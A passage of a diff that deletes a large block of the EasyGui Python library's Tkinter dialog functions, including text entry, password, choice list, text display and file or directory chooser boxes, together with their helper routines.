- Returns the text that the user entered, or None if he cancels the operation.
-
- By default, enterbox strips its result (i.e. removes leading and trailing
- whitespace). (If you want it not to strip, use keyword argument: strip=False.)
- This makes it easier to test the results of the call::
-
- reply = enterbox(....)
- if reply:
- ...
- else:
- ...
- """
- result = __fillablebox(msg, title, default=default, mask=None,image=image,root=root)
- if result and strip:
- result = result.strip()
- return result
-
-
-def passwordbox(msg="Enter your password."
- , title=" "
- , default=""
- , image=None
- , root=None
- ):
- """
- Show a box in which a user can enter a password.
- The text is masked with asterisks, so the password is not displayed.
- Returns the text that the user entered, or None if he cancels the operation.
- """
- return __fillablebox(msg, title, default, mask="*",image=image,root=root)
-
-
-def __fillablebox(msg
- , title=""
- , default=""
- , mask=None
- , image=None
- , root=None
- ):
- """
- Show a box in which a user can enter some text.
- You may optionally specify some default text, which will appear in the
- enterbox when it is displayed.
- Returns the text that the user entered, or None if he cancels the operation.
- """
-
- global boxRoot, __enterboxText, __enterboxDefaultText
- global cancelButton, entryWidget, okButton
-
- if title == None: title = ""
- if default == None: default = ""
- __enterboxDefaultText = default
- __enterboxText = __enterboxDefaultText
-
- if root:
- root.withdraw()
- boxRoot = Toplevel(master=root)
- boxRoot.withdraw()
- else:
- boxRoot = Tk()
- boxRoot.withdraw()
-
- boxRoot.protocol('WM_DELETE_WINDOW', denyWindowManagerClose )
- boxRoot.title(title)
- boxRoot.iconname('Dialog')
- boxRoot.geometry(rootWindowPosition)
- boxRoot.bind("<Escape>", __enterboxCancel)
-
- # ------------- define the messageFrame ---------------------------------
- messageFrame = Frame(master=boxRoot)
- messageFrame.pack(side=TOP, fill=BOTH)
-
- # ------------- define the imageFrame ---------------------------------
- tk_Image = None
- if image:
- imageFilename = os.path.normpath(image)
- junk,ext = os.path.splitext(imageFilename)
-
- if os.path.exists(imageFilename):
- if ext.lower() in [".gif", ".pgm", ".ppm"]:
- tk_Image = PhotoImage(master=boxRoot, file=imageFilename)
- else:
- if PILisLoaded:
- try:
- pil_Image = PILImage.open(imageFilename)
- tk_Image = PILImageTk.PhotoImage(pil_Image, master=boxRoot)
- except:
- msg += ImageErrorMsg % (imageFilename,
- "\nThe Python Imaging Library (PIL) could not convert this file to a displayable image."
- "\n\nPIL reports:\n" + exception_format())
-
- else: # PIL is not loaded
- msg += ImageErrorMsg % (imageFilename,
- "\nI could not import the Python Imaging Library (PIL) to display the image.\n\n"
- "You may need to install PIL\n"
- "(http://www.pythonware.com/products/pil/)\n"
- "to display " + ext + " image files.")
-
- else:
- msg += ImageErrorMsg % (imageFilename, "\nImage file not found.")
-
- if tk_Image:
- imageFrame = Frame(master=boxRoot)
- imageFrame.pack(side=TOP, fill=BOTH)
- label = Label(imageFrame,image=tk_Image)
- label.image = tk_Image # keep a reference!
- label.pack(side=TOP, expand=YES, fill=X, padx='1m', pady='1m')
-
- # ------------- define the buttonsFrame ---------------------------------
- buttonsFrame = Frame(master=boxRoot)
- buttonsFrame.pack(side=TOP, fill=BOTH)
-
-
- # ------------- define the entryFrame ---------------------------------
- entryFrame = Frame(master=boxRoot)
- entryFrame.pack(side=TOP, fill=BOTH)
-
- # ------------- define the buttonsFrame ---------------------------------
- buttonsFrame = Frame(master=boxRoot)
- buttonsFrame.pack(side=TOP, fill=BOTH)
-
- #-------------------- the msg widget ----------------------------
- messageWidget = Message(messageFrame, width="4.5i", text=msg)
- messageWidget.configure(font=(PROPORTIONAL_FONT_FAMILY,PROPORTIONAL_FONT_SIZE))
- messageWidget.pack(side=RIGHT, expand=1, fill=BOTH, padx='3m', pady='3m')
-
- # --------- entryWidget ----------------------------------------------
- entryWidget = Entry(entryFrame, width=40)
- bindArrows(entryWidget)
- entryWidget.configure(font=(PROPORTIONAL_FONT_FAMILY,TEXT_ENTRY_FONT_SIZE))
- if mask:
- entryWidget.configure(show=mask)
- entryWidget.pack(side=LEFT, padx="3m")
- entryWidget.bind("<Return>", __enterboxGetText)
- entryWidget.bind("<Escape>", __enterboxCancel)
- # put text into the entryWidget
- entryWidget.insert(0,__enterboxDefaultText)
-
- # ------------------ ok button -------------------------------
- okButton = Button(buttonsFrame, takefocus=1, text="OK")
- bindArrows(okButton)
- okButton.pack(expand=1, side=LEFT, padx='3m', pady='3m', ipadx='2m', ipady='1m')
-
- # for the commandButton, bind activation events to the activation event handler
- commandButton = okButton
- handler = __enterboxGetText
- for selectionEvent in STANDARD_SELECTION_EVENTS:
- commandButton.bind("<%s>" % selectionEvent, handler)
-
-
- # ------------------ cancel button -------------------------------
- cancelButton = Button(buttonsFrame, takefocus=1, text="Cancel")
- bindArrows(cancelButton)
- cancelButton.pack(expand=1, side=RIGHT, padx='3m', pady='3m', ipadx='2m', ipady='1m')
-
- # for the commandButton, bind activation events to the activation event handler
- commandButton = cancelButton
- handler = __enterboxCancel
- for selectionEvent in STANDARD_SELECTION_EVENTS:
- commandButton.bind("<%s>" % selectionEvent, handler)
-
- # ------------------- time for action! -----------------
- entryWidget.focus_force() # put the focus on the entryWidget
- boxRoot.deiconify()
- boxRoot.mainloop() # run it!
-
- # -------- after the run has completed ----------------------------------
- if root: root.deiconify()
- boxRoot.destroy() # button_click didn't destroy boxRoot, so we do it now
- return __enterboxText
-
-
-def __enterboxGetText(event):
- global __enterboxText
-
- __enterboxText = entryWidget.get()
- boxRoot.quit()
-
-
-def __enterboxRestore(event):
- global entryWidget
-
- entryWidget.delete(0,len(entryWidget.get()))
- entryWidget.insert(0, __enterboxDefaultText)
-
-
-def __enterboxCancel(event):
- global __enterboxText
-
- __enterboxText = None
- boxRoot.quit()
-
-def denyWindowManagerClose():
- """ don't allow WindowManager close
- """
- x = Tk()
- x.withdraw()
- x.bell()
- x.destroy()
-
-
-
-#-------------------------------------------------------------------
-# multchoicebox
-#-------------------------------------------------------------------
-def multchoicebox(msg="Pick as many items as you like."
- , title=" "
- , choices=()
- , **kwargs
- ):
- """
- Present the user with a list of choices.
- allow him to select multiple items and return them in a list.
- if the user doesn't choose anything from the list, return the empty list.
- return None if he cancelled selection.
-
- @arg msg: the msg to be displayed.
- @arg title: the window title
- @arg choices: a list or tuple of the choices to be displayed
- """
- if len(choices) == 0: choices = ["Program logic error - no choices were specified."]
-
- global __choiceboxMultipleSelect
- __choiceboxMultipleSelect = 1
- return __choicebox(msg, title, choices)
-
-
-#-----------------------------------------------------------------------
-# choicebox
-#-----------------------------------------------------------------------
-def choicebox(msg="Pick something."
- , title=" "
- , choices=()
- ):
- """
- Present the user with a list of choices.
- return the choice that he selects.
- return None if he cancels the selection.
-
- @arg msg: the msg to be displayed.
- @arg title: the window title
- @arg choices: a list or tuple of the choices to be displayed
- """
- if len(choices) == 0: choices = ["Program logic error - no choices were specified."]
-
- global __choiceboxMultipleSelect
- __choiceboxMultipleSelect = 0
- return __choicebox(msg,title,choices)
-
-
-#-----------------------------------------------------------------------
-# __choicebox
-#-----------------------------------------------------------------------
-def __choicebox(msg
- , title
- , choices
- ):
- """
- internal routine to support choicebox() and multchoicebox()
- """
- global boxRoot, __choiceboxResults, choiceboxWidget, defaultText
- global choiceboxWidget, choiceboxChoices
- #-------------------------------------------------------------------
- # If choices is a tuple, we make it a list so we can sort it.
- # If choices is already a list, we make a new list, so that when
- # we sort the choices, we don't affect the list object that we
- # were given.
- #-------------------------------------------------------------------
- choices = list(choices[:])
- if len(choices) == 0:
- choices = ["Program logic error - no choices were specified."]
- defaultButtons = ["OK", "Cancel"]
-
- # make sure all choices are strings
- for index in range(len(choices)):
- choices[index] = str(choices[index])
-
- lines_to_show = min(len(choices), 20)
- lines_to_show = 20
-
- if title == None: title = ""
-
- # Initialize __choiceboxResults
- # This is the value that will be returned if the user clicks the close icon
- __choiceboxResults = None
-
- boxRoot = Tk()
- boxRoot.protocol('WM_DELETE_WINDOW', denyWindowManagerClose )
- screen_width = boxRoot.winfo_screenwidth()
- screen_height = boxRoot.winfo_screenheight()
- root_width = int((screen_width * 0.8))
- root_height = int((screen_height * 0.5))
- root_xpos = int((screen_width * 0.1))
- root_ypos = int((screen_height * 0.05))
-
- boxRoot.title(title)
- boxRoot.iconname('Dialog')
- rootWindowPosition = "+0+0"
- boxRoot.geometry(rootWindowPosition)
- boxRoot.expand=NO
- boxRoot.minsize(root_width, root_height)
- rootWindowPosition = "+" + str(root_xpos) + "+" + str(root_ypos)
- boxRoot.geometry(rootWindowPosition)
-
- # ---------------- put the frames in the window -----------------------------------------
- message_and_buttonsFrame = Frame(master=boxRoot)
- message_and_buttonsFrame.pack(side=TOP, fill=X, expand=NO)
-
- messageFrame = Frame(message_and_buttonsFrame)
- messageFrame.pack(side=LEFT, fill=X, expand=YES)
- #messageFrame.pack(side=TOP, fill=X, expand=YES)
-
- buttonsFrame = Frame(message_and_buttonsFrame)
- buttonsFrame.pack(side=RIGHT, expand=NO, pady=0)
- #buttonsFrame.pack(side=TOP, expand=YES, pady=0)
-
- choiceboxFrame = Frame(master=boxRoot)
- choiceboxFrame.pack(side=BOTTOM, fill=BOTH, expand=YES)
-
- # -------------------------- put the widgets in the frames ------------------------------
-
- # ---------- put a msg widget in the msg frame-------------------
- messageWidget = Message(messageFrame, anchor=NW, text=msg, width=int(root_width * 0.9))
- messageWidget.configure(font=(PROPORTIONAL_FONT_FAMILY,PROPORTIONAL_FONT_SIZE))
- messageWidget.pack(side=LEFT, expand=YES, fill=BOTH, padx='1m', pady='1m')
-
- # -------- put the choiceboxWidget in the choiceboxFrame ---------------------------
- choiceboxWidget = Listbox(choiceboxFrame
- , height=lines_to_show
- , borderwidth="1m"
- , relief="flat"
- , bg="white"
- )
-
- if __choiceboxMultipleSelect:
- choiceboxWidget.configure(selectmode=MULTIPLE)
-
- choiceboxWidget.configure(font=(PROPORTIONAL_FONT_FAMILY,PROPORTIONAL_FONT_SIZE))
-
- # add a vertical scrollbar to the frame
- rightScrollbar = Scrollbar(choiceboxFrame, orient=VERTICAL, command=choiceboxWidget.yview)
- choiceboxWidget.configure(yscrollcommand = rightScrollbar.set)
-
- # add a horizontal scrollbar to the frame
- bottomScrollbar = Scrollbar(choiceboxFrame, orient=HORIZONTAL, command=choiceboxWidget.xview)
- choiceboxWidget.configure(xscrollcommand = bottomScrollbar.set)
-
- # pack the Listbox and the scrollbars. Note that although we must define
- # the Listbox first, we must pack it last, so that the bottomScrollbar will
- # be located properly.
-
- bottomScrollbar.pack(side=BOTTOM, fill = X)
- rightScrollbar.pack(side=RIGHT, fill = Y)
-
- choiceboxWidget.pack(side=LEFT, padx="1m", pady="1m", expand=YES, fill=BOTH)
-
- #---------------------------------------------------
- # sort the choices
- # eliminate duplicates
- # put the choices into the choiceboxWidget
- #---------------------------------------------------
- for index in range(len(choices)):
- choices[index] = str(choices[index])
-
- if runningPython3:
- choices.sort(key=str.lower)
- else:
- choices.sort( lambda x,y: cmp(x.lower(), y.lower())) # case-insensitive sort
-
- lastInserted = None
- choiceboxChoices = []
- for choice in choices:
- if choice == lastInserted: pass
- else:
- choiceboxWidget.insert(END, choice)
- choiceboxChoices.append(choice)
- lastInserted = choice
-
- boxRoot.bind('<Any-Key>', KeyboardListener)
-
- # put the buttons in the buttonsFrame
- if len(choices) > 0:
- okButton = Button(buttonsFrame, takefocus=YES, text="OK", height=1, width=6)
- bindArrows(okButton)
- okButton.pack(expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m")
-
- # for the commandButton, bind activation events to the activation event handler
- commandButton = okButton
- handler = __choiceboxGetChoice
- for selectionEvent in STANDARD_SELECTION_EVENTS:
- commandButton.bind("<%s>" % selectionEvent, handler)
-
- # now bind the keyboard events
- choiceboxWidget.bind("<Return>", __choiceboxGetChoice)
- choiceboxWidget.bind("<Double-Button-1>", __choiceboxGetChoice)
- else:
- # now bind the keyboard events
- choiceboxWidget.bind("<Return>", __choiceboxCancel)
- choiceboxWidget.bind("<Double-Button-1>", __choiceboxCancel)
-
- cancelButton = Button(buttonsFrame, takefocus=YES, text="Cancel", height=1, width=6)
- bindArrows(cancelButton)
- cancelButton.pack(expand=NO, side=BOTTOM, padx='2m', pady='1m', ipady="1m", ipadx="2m")
-
- # for the commandButton, bind activation events to the activation event handler
- commandButton = cancelButton
- handler = __choiceboxCancel
- for selectionEvent in STANDARD_SELECTION_EVENTS:
- commandButton.bind("<%s>" % selectionEvent, handler)
-
-
- # add special buttons for multiple select features
- if len(choices) > 0 and __choiceboxMultipleSelect:
- selectionButtonsFrame = Frame(messageFrame)
- selectionButtonsFrame.pack(side=RIGHT, fill=Y, expand=NO)
-
- selectAllButton = Button(selectionButtonsFrame, text="Select All", height=1, width=6)
- bindArrows(selectAllButton)
-
- selectAllButton.bind("<Button-1>",__choiceboxSelectAll)
- selectAllButton.pack(expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m")
-
- clearAllButton = Button(selectionButtonsFrame, text="Clear All", height=1, width=6)
- bindArrows(clearAllButton)
- clearAllButton.bind("<Button-1>",__choiceboxClearAll)
- clearAllButton.pack(expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m")
-
-
- # -------------------- bind some keyboard events ----------------------------
- boxRoot.bind("<Escape>", __choiceboxCancel)
-
- # --------------------- the action begins -----------------------------------
- # put the focus on the choiceboxWidget, and the select highlight on the first item
- choiceboxWidget.select_set(0)
- choiceboxWidget.focus_force()
-
- # --- run it! -----
- boxRoot.mainloop()
-
- boxRoot.destroy()
- return __choiceboxResults
-
-
-def __choiceboxGetChoice(event):
- global boxRoot, __choiceboxResults, choiceboxWidget
-
- if __choiceboxMultipleSelect:
- __choiceboxResults = [choiceboxWidget.get(index) for index in choiceboxWidget.curselection()]
-
- else:
- choice_index = choiceboxWidget.curselection()
- __choiceboxResults = choiceboxWidget.get(choice_index)
-
- # writeln("Debugging> mouse-event=", event, " event.type=", event.type)
- # writeln("Debugging> choice=", choice_index, __choiceboxResults)
- boxRoot.quit()
-
-
-def __choiceboxSelectAll(event):
- global choiceboxWidget, choiceboxChoices
-
- choiceboxWidget.selection_set(0, len(choiceboxChoices)-1)
-
-def __choiceboxClearAll(event):
- global choiceboxWidget, choiceboxChoices
-
- choiceboxWidget.selection_clear(0, len(choiceboxChoices)-1)
-
-
-
-def __choiceboxCancel(event):
- global boxRoot, __choiceboxResults
-
- __choiceboxResults = None
- boxRoot.quit()
-
-
-def KeyboardListener(event):
- global choiceboxChoices, choiceboxWidget
- key = event.keysym
- if len(key) <= 1:
- if key in string.printable:
- # Find the key in the list.
- # before we clear the list, remember the selected member
- try:
- start_n = int(choiceboxWidget.curselection()[0])
- except IndexError:
- start_n = -1
-
- ## clear the selection.
- choiceboxWidget.selection_clear(0, 'end')
-
- ## start from previous selection +1
- for n in range(start_n+1, len(choiceboxChoices)):
- item = choiceboxChoices[n]
- if item[0].lower() == key.lower():
- choiceboxWidget.selection_set(first=n)
- choiceboxWidget.see(n)
- return
- else:
- # has not found it so loop from top
- for n in range(len(choiceboxChoices)):
- item = choiceboxChoices[n]
- if item[0].lower() == key.lower():
- choiceboxWidget.selection_set(first = n)
- choiceboxWidget.see(n)
- return
-
- # nothing matched -- we'll look for the next logical choice
- for n in range(len(choiceboxChoices)):
- item = choiceboxChoices[n]
- if item[0].lower() > key.lower():
- if n > 0:
- choiceboxWidget.selection_set(first = (n-1))
- else:
- choiceboxWidget.selection_set(first = 0)
- choiceboxWidget.see(n)
- return
-
- # still no match (nothing was greater than the key)
- # we set the selection to the last item in the list
- lastIndex = len(choiceboxChoices)-1
- choiceboxWidget.selection_set(first = lastIndex)
- choiceboxWidget.see(lastIndex)
- return
-
-#-----------------------------------------------------------------------
-# exception_format
-#-----------------------------------------------------------------------
-def exception_format():
- """
- Convert exception info into a string suitable for display.
- """
- return "".join(traceback.format_exception(
- sys.exc_info()[0]
- , sys.exc_info()[1]
- , sys.exc_info()[2]
- ))
-
-#-----------------------------------------------------------------------
-# exceptionbox
-#-----------------------------------------------------------------------
-def exceptionbox(msg=None, title=None):
- """
- Display a box that gives information about
- an exception that has just been raised.
-
- The caller may optionally pass in a title for the window, or a
- msg to accompany the error information.
-
- Note that you do not need to (and cannot) pass an exception object
- as an argument. The latest exception will automatically be used.
- """
- if title == None: title = "Error Report"
- if msg == None:
- msg = "An error (exception) has occurred in the program."
-
- codebox(msg, title, exception_format())
-
-#-------------------------------------------------------------------
-# codebox
-#-------------------------------------------------------------------
-
-def codebox(msg=""
- , title=" "
- , text=""
- ):
- """
- Display some text in a monospaced font, with no line wrapping.
- This function is suitable for displaying code and text that is
- formatted using spaces.
-
- The text parameter should be a string, or a list or tuple of lines to be
- displayed in the textbox.
- """
- return textbox(msg, title, text, codebox=1 )
-
-#-------------------------------------------------------------------
-# textbox
-#-------------------------------------------------------------------
-def textbox(msg=""
- , title=" "
- , text=""
- , codebox=0
- ):
- """
- Display some text in a proportional font with line wrapping at word breaks.
- This function is suitable for displaying general written text.
-
- The text parameter should be a string, or a list or tuple of lines to be
- displayed in the textbox.
- """
-
- if msg == None: msg = ""
- if title == None: title = ""
-
- global boxRoot, __replyButtonText, __widgetTexts, buttonsFrame
- global rootWindowPosition
- choices = ["OK"]
- __replyButtonText = choices[0]
-
-
- boxRoot = Tk()
-
- boxRoot.protocol('WM_DELETE_WINDOW', denyWindowManagerClose )
-
- screen_width = boxRoot.winfo_screenwidth()
- screen_height = boxRoot.winfo_screenheight()
- root_width = int((screen_width * 0.8))
- root_height = int((screen_height * 0.5))
- root_xpos = int((screen_width * 0.1))
- root_ypos = int((screen_height * 0.05))
-
- boxRoot.title(title)
- boxRoot.iconname('Dialog')
- rootWindowPosition = "+0+0"
- boxRoot.geometry(rootWindowPosition)
- boxRoot.expand=NO
- boxRoot.minsize(root_width, root_height)
- rootWindowPosition = "+" + str(root_xpos) + "+" + str(root_ypos)
- boxRoot.geometry(rootWindowPosition)
-
- mainframe = Frame(master=boxRoot)
- mainframe.pack(side=TOP, fill=BOTH, expand=YES)
-
- # ---- put frames in the window -----------------------------------
- # we pack the textboxFrame first, so it will expand first
- textboxFrame = Frame(mainframe, borderwidth=3)
- textboxFrame.pack(side=BOTTOM , fill=BOTH, expand=YES)
-
- message_and_buttonsFrame = Frame(mainframe)
- message_and_buttonsFrame.pack(side=TOP, fill=X, expand=NO)
-
- messageFrame = Frame(message_and_buttonsFrame)
- messageFrame.pack(side=LEFT, fill=X, expand=YES)
-
- buttonsFrame = Frame(message_and_buttonsFrame)
- buttonsFrame.pack(side=RIGHT, expand=NO)
-
- # -------------------- put widgets in the frames --------------------
-
- # put a textArea in the top frame
- if codebox:
- character_width = int((root_width * 0.6) / MONOSPACE_FONT_SIZE)
- textArea = Text(textboxFrame,height=25,width=character_width, padx="2m", pady="1m")
- textArea.configure(wrap=NONE)
- textArea.configure(font=(MONOSPACE_FONT_FAMILY, MONOSPACE_FONT_SIZE))
-
- else:
- character_width = int((root_width * 0.6) / MONOSPACE_FONT_SIZE)
- textArea = Text(
- textboxFrame
- , height=25
- , width=character_width
- , padx="2m"
- , pady="1m"
- )
- textArea.configure(wrap=WORD)
- textArea.configure(font=(PROPORTIONAL_FONT_FAMILY,PROPORTIONAL_FONT_SIZE))
-
-
- # some simple keybindings for scrolling
- mainframe.bind("<Next>" , textArea.yview_scroll( 1,PAGES))
- mainframe.bind("<Prior>", textArea.yview_scroll(-1,PAGES))
-
- mainframe.bind("<Right>", textArea.xview_scroll( 1,PAGES))
- mainframe.bind("<Left>" , textArea.xview_scroll(-1,PAGES))
-
- mainframe.bind("<Down>", textArea.yview_scroll( 1,UNITS))
- mainframe.bind("<Up>" , textArea.yview_scroll(-1,UNITS))
-
-
- # add a vertical scrollbar to the frame
- rightScrollbar = Scrollbar(textboxFrame, orient=VERTICAL, command=textArea.yview)
- textArea.configure(yscrollcommand = rightScrollbar.set)
-
- # add a horizontal scrollbar to the frame
- bottomScrollbar = Scrollbar(textboxFrame, orient=HORIZONTAL, command=textArea.xview)
- textArea.configure(xscrollcommand = bottomScrollbar.set)
-
- # pack the textArea and the scrollbars. Note that although we must define
- # the textArea first, we must pack it last, so that the bottomScrollbar will
- # be located properly.
-
- # Note that we need a bottom scrollbar only for code.
- # Text will be displayed with wordwrap, so we don't need to have a horizontal
- # scroll for it.
- if codebox:
- bottomScrollbar.pack(side=BOTTOM, fill=X)
- rightScrollbar.pack(side=RIGHT, fill=Y)
-
- textArea.pack(side=LEFT, fill=BOTH, expand=YES)
-
-
- # ---------- put a msg widget in the msg frame-------------------
- messageWidget = Message(messageFrame, anchor=NW, text=msg, width=int(root_width * 0.9))
- messageWidget.configure(font=(PROPORTIONAL_FONT_FAMILY,PROPORTIONAL_FONT_SIZE))
- messageWidget.pack(side=LEFT, expand=YES, fill=BOTH, padx='1m', pady='1m')
-
- # put the buttons in the buttonsFrame
- okButton = Button(buttonsFrame, takefocus=YES, text="OK", height=1, width=6)
- okButton.pack(expand=NO, side=TOP, padx='2m', pady='1m', ipady="1m", ipadx="2m")
-
- # for the commandButton, bind activation events to the activation event handler
- commandButton = okButton
- handler = __textboxOK
- for selectionEvent in ["Return","Button-1","Escape"]:
- commandButton.bind("<%s>" % selectionEvent, handler)
-
-
- # ----------------- the action begins ----------------------------------------
- try:
- # load the text into the textArea
- if type(text) == type("abc"): pass
- else:
- try:
- text = "".join(text) # convert a list or a tuple to a string
- except:
- msgbox("Exception when trying to convert "+ str(type(text)) + " to text in textArea")
- sys.exit(16)
- textArea.insert(END,text, "normal")
-
- except:
- msgbox("Exception when trying to load the textArea.")
- sys.exit(16)
-
- try:
- okButton.focus_force()
- except:
- msgbox("Exception when trying to put focus on okButton.")
- sys.exit(16)
-
- boxRoot.mainloop()
-
- # this line MUST go before the line that destroys boxRoot
- areaText = textArea.get(0.0,END)
- boxRoot.destroy()
- return areaText # return __replyButtonText
-
-#-------------------------------------------------------------------
-# __textboxOK
-#-------------------------------------------------------------------
-def __textboxOK(event):
- global boxRoot
- boxRoot.quit()
-
-
-
-#-------------------------------------------------------------------
-# diropenbox
-#-------------------------------------------------------------------
-def diropenbox(msg=None
- , title=None
- , default=None
- ):
- """
- A dialog to get a directory name.
- Note that the msg argument, if specified, is ignored.
-
- Returns the name of a directory, or None if user chose to cancel.
-
- If the "default" argument specifies a directory name, and that
- directory exists, then the dialog box will start with that directory.
- """
- title=getFileDialogTitle(msg,title)
- localRoot = Tk()
- localRoot.withdraw()
- if not default: default = None
- f = tk_FileDialog.askdirectory(
- parent=localRoot
- , title=title
- , initialdir=default
- , initialfile=None
- )
- localRoot.destroy()
- if not f: return None
- return os.path.normpath(f)
-
-
-
-#-------------------------------------------------------------------
-# getFileDialogTitle
-#-------------------------------------------------------------------
-def getFileDialogTitle(msg
- , title
- ):
- if msg and title: return "%s - %s" % (title,msg)
- if msg and not title: return str(msg)
- if title and not msg: return str(title)
- return None # no message and no title
-
-#-------------------------------------------------------------------
-# class FileTypeObject for use with fileopenbox
-#-------------------------------------------------------------------
-class FileTypeObject:
- def __init__(self,filemask):
- if len(filemask) == 0:
- raise AssertionError('Filetype argument is empty.')
-
- self.masks = []
-
- if type(filemask) == type("abc"): # a string
- self.initializeFromString(filemask)
-
- elif type(filemask) == type([]): # a list
- if len(filemask) < 2:
- raise AssertionError('Invalid filemask.\n'
- +'List contains less than 2 members: "%s"' % filemask)
- else:
- self.name = filemask[-1]
- self.masks = list(filemask[:-1] )
- else:
- raise AssertionError('Invalid filemask: "%s"' % filemask)
-
- def __eq__(self,other):
- if self.name == other.name: return True
- return False
-
- def add(self,other):
- for mask in other.masks:
- if mask in self.masks: pass
- else: self.masks.append(mask)
-
- def toTuple(self):
- return (self.name,tuple(self.masks))
-
- def isAll(self):
- if self.name == "All files": return True
- return False
-
- def initializeFromString(self, filemask):
- # remove everything except the extension from the filemask
- self.ext = os.path.splitext(filemask)[1]
- if self.ext == "" : self.ext = ".*"
- if self.ext == ".": self.ext = ".*"
- self.name = self.getName()
- self.masks = ["*" + self.ext]
-
- def getName(self):
- e = self.ext
- if e == ".*" : return "All files"
- if e == ".txt": return "Text files"
- if e == ".py" : return "Python files"
- if e == ".pyc" : return "Python files"
- if e == ".xls": return "Excel files"
- if e.startswith("."):
- return e[1:].upper() + " files"
- return e.upper() + " files"
-
-
-#-------------------------------------------------------------------
-# fileopenbox
-#-------------------------------------------------------------------
-def fileopenbox(msg=None
- , title=None
- , default="*"
- , filetypes=None
- ):
- """
- A dialog to get a file name.
-
- About the "default" argument
- ============================
- The "default" argument specifies a filepath that (normally)
- contains one or more wildcards.
- fileopenbox will display only files that match the default filepath.
- If omitted, defaults to "*" (all files in the current directory).
-
- WINDOWS EXAMPLE::
- ...default="c:/myjunk/*.py"
- will open in directory c:\myjunk\ and show all Python files.
-
- WINDOWS EXAMPLE::
- ...default="c:/myjunk/test*.py"
- will open in directory c:\myjunk\ and show all Python files
- whose names begin with "test".
-
-
- Note that on Windows, fileopenbox automatically changes the path
- separator to the Windows path separator (backslash).
-
- About the "filetypes" argument
- ==============================
- If specified, it should contain a list of items,
- where each item is either::
- - a string containing a filemask # e.g. "*.txt"
- - a list of strings, where all of the strings except the last one
- are filemasks (each beginning with "*.",
- such as "*.txt" for text files, "*.py" for Python files, etc.).
- and the last string contains a filetype description
-
- EXAMPLE::
- filetypes = ["*.css", ["*.htm", "*.html", "HTML files"] ]
-
- NOTE THAT
- =========
-
- If the filetypes list does not contain ("All files","*"),
- it will be added.
-
- If the filetypes list does not contain a filemask that includes
- the extension of the "default" argument, it will be added.
- For example, if default="*abc.py"
- and no filetypes argument was specified, then
- "*.py" will automatically be added to the filetypes argument.
-
- @rtype: string or None
- @return: the name of a file, or None if user chose to cancel
-
- @arg msg: the msg to be displayed.
- @arg title: the window title
- @arg default: filepath with wildcards
- @arg filetypes: filemasks that a user can choose, e.g. "*.txt"
- """
- localRoot = Tk()
- localRoot.withdraw()
-
- initialbase, initialfile, initialdir, filetypes = fileboxSetup(default,filetypes)
-
- #------------------------------------------------------------
- # if initialfile contains no wildcards; we don't want an
- # initial file. It won't be used anyway.
- # Also: if initialbase is simply "*", we don't want an
- # initialfile; it is not doing any useful work.
- #------------------------------------------------------------
- if (initialfile.find("*") < 0) and (initialfile.find("?") < 0):
- initialfile = None
- elif initialbase == "*":
- initialfile = None
-
- f = tk_FileDialog.askopenfilename(parent=localRoot
- , title=getFileDialogTitle(msg,title)
- , initialdir=initialdir
- , initialfile=initialfile
- , filetypes=filetypes
- )
-
- localRoot.destroy()
-
- if not f: return None
- return os.path.normpath(f)
-
-
-#-------------------------------------------------------------------
-# filesavebox
-#-------------------------------------------------------------------
-def filesavebox(msg=None
- , title=None
- , default=""
- , filetypes=None
- ):
- """
- A dialog to get the name of a file to save.
- Returns the name of a file, or None if user chose to cancel.
-
- The "default" argument should contain a filename (i.e. the
- current name of the file to be saved). It may also be empty,
- or contain a filemask that includes wildcards.
-
- The "filetypes" argument works like the "filetypes" argument to
- fileopenbox.
- """
-
- localRoot = Tk()
- localRoot.withdraw()
-
- initialbase, initialfile, initialdir, filetypes = fileboxSetup(default,filetypes)
-
- f = tk_FileDialog.asksaveasfilename(parent=localRoot
- , title=getFileDialogTitle(msg,title)
- , initialfile=initialfile
- , initialdir=initialdir
- , filetypes=filetypes
- )
- localRoot.destroy()
- if not f: return None
- return os.path.normpath(f)
-
-
-#-------------------------------------------------------------------
-#
-# fileboxSetup
-#
-#-------------------------------------------------------------------
-def fileboxSetup(default,filetypes):
- if not default: default = os.path.join(".","*")
- initialdir, initialfile = os.path.split(default)
- if not initialdir : initialdir = "."
- if not initialfile: initialfile = "*"
- initialbase, initialext = os.path.splitext(initialfile)
- initialFileTypeObject = FileTypeObject(initialfile)
-
- allFileTypeObject = FileTypeObject("*")
- ALL_filetypes_was_specified = False
-
- if not filetypes: filetypes= []
- filetypeObjects = []
-
- for filemask in filetypes:
- fto = FileTypeObject(filemask)
-
- if fto.isAll():
- ALL_filetypes_was_specified = True # remember this
-
- if fto == initialFileTypeObject:
- initialFileTypeObject.add(fto) # add fto to initialFileTypeObject
- else:
- filetypeObjects.append(fto)
-
- #------------------------------------------------------------------
- # make sure that the list of filetypes includes the ALL FILES type.
- #------------------------------------------------------------------
- if ALL_filetypes_was_specified:
- pass
- elif allFileTypeObject == initialFileTypeObject:
- pass
- else:
- filetypeObjects.insert(0,allFileTypeObject)
- #------------------------------------------------------------------
- # Make sure that the list includes the initialFileTypeObject
- # in the position in the list that will make it the default.
- # This changed between Python version 2.5 and 2.6
- #------------------------------------------------------------------
- if len(filetypeObjects) == 0:
- filetypeObjects.append(initialFileTypeObject)
-
- if initialFileTypeObject in (filetypeObjects[0], filetypeObjects[-1]):
- pass
- else:
- if runningPython26:
- filetypeObjects.append(initialFileTypeObject)
- else:
- filetypeObjects.insert(0,initialFileTypeObject)
-
- filetypes = [fto.toTuple() for fto in filetypeObjects]
-
- return initialbase, initialfile, initialdir, filetypes
-
-#-------------------------------------------------------------------
-# utility routines
-#-------------------------------------------------------------------
-# These routines are used by several other functions in the EasyGui module.
-
-def __buttonEvent(event):
- """
- Handle an event that is generated by a person clicking a button.
- """
- global boxRoot, __widgetTexts, __replyButtonText
- __replyButtonText = __widgetTexts[event.widget]
- boxRoot.quit() # quit the main loop
-
-
-def __put_buttons_in_buttonframe(choices):
- """Put the buttons in the buttons frame
- """
- global __widgetTexts, __firstWidget, buttonsFrame
-
- __firstWidget = None
- __widgetTexts = {}
-
- i = 0
-
- for buttonText in choices:
- tempButton = Button(buttonsFrame, takefocus=1, text=buttonText)
- bindArrows(tempButton)
- tempButton.pack(expand=YES, side=LEFT, padx='1m', pady='1m', ipadx='2m', ipady='1m')
-
- # remember the text associated with this widget
- __widgetTexts[tempButton] = buttonText
-
- # remember the first widget, so we can put the focus there
- if i == 0:
- __firstWidget = tempButton
- i = 1
-
